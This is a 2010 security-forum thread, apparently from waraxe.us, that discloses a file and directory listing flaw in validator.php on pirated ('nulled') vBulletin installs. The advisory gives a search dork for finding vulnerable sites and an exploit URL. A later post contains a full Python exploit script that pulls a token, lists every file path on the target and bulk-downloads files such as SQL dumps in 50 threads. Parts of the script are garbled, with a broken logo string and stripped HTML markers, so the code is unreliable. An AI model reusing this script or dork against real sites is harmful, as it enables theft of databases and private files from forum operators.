|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 81
Members: 0
Total: 81
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vBulletin nulled full disclosure |
|
Posted: Fri Jan 22, 2010 8:39 am |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Code: |
*\-----------------------------------------------------------------------------/*
____ _ _ _ _ (nulled)
| _ \ | | | | | (_)
__ _| |_) |_ _| | | ___| |_ _ _ __
\ \ / / _ <| | | | | |/ _ \ __| | '_ \
\ V /| |_) | |_| | | | __/ |_| | | | |
\_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
Full disclosure...
*\-----------------------------------------------------------------------------/*
Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php"
*\-----------------------------------------------------------------------------/*
Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i
nstalled...
*\-----------------------------------------------------------------------------/*
Exploit: http://www.website.com/vB_forum/validator.php
*\-----------------------------------------------------------------------------/*
Note: Work on many nulled versions (maybe all)
*\-----------------------------------------------------------------------------/*
Copyrights: http://tinkode.baywords.com
*\-----------------------------------------------------------------------------/*
Greetz: http://www.insecurity.ro
*\-----------------------------------------------------------------------------/* |
|
|
|
|
|
|
|
|
|
Posted: Fri Jan 22, 2010 10:55 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
This is old like me.)))) |
|
|
|
|
Posted: Fri Jan 22, 2010 6:08 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Maybe old but now posted in public if its too old and you know it why you not post it before |
|
|
|
|
Posted: Fri Jan 22, 2010 6:20 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Such vulnerability can be useful |
|
|
|
|
Posted: Fri Jan 22, 2010 6:25 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Many forums like i see are vuln to these |
|
|
|
|
Posted: Fri Jan 22, 2010 6:29 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
VERTIGO wrote: | Maybe old but now posted in public if its too old and you know it why you not post it before |
Posted 2-3 years ago dude.A'm not reposter. |
|
|
|
|
Posted: Fri Jan 22, 2010 6:35 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jan 24, 2010 1:33 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Code: | #! /usr/bin/env python3.1
#
################################################################
# ____ _ _ _ _ (validator.php) #
# | _ \ | | | | | (_) #
# __ _| |_) |_ _| | | ___| |_ _ _ __ #
# \ \ / / _ <| | | | | |/ _ \ __| | '_ \ #
# \ V /| |_) | |_| | | | __/ |_| | | | | #
# \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| #
# @expl0it... #
################################################################
# [ vBulletin Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | ____ _ _ _ _ (TM) |
\t | | _ \ | | | | | (_) |
\t | __ _| |_) |_ _| | | ___| |_ _ _ __ |
\t | \ \ / / _ all |
| vbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
source = source[source.index(word) + len(word):]
value = source[:source.index("'")]
print("[+]Obtaining paths...")
hurl = url + "/validator.php?op={}".format(value)
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("
")
if index != -1:
lastk = line[index + 4:line.index("
")].strip(" ")
index = line.find("")
if index != -1:
lastv = line[index + 8:line.index("")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("vBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main() |
|
|
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|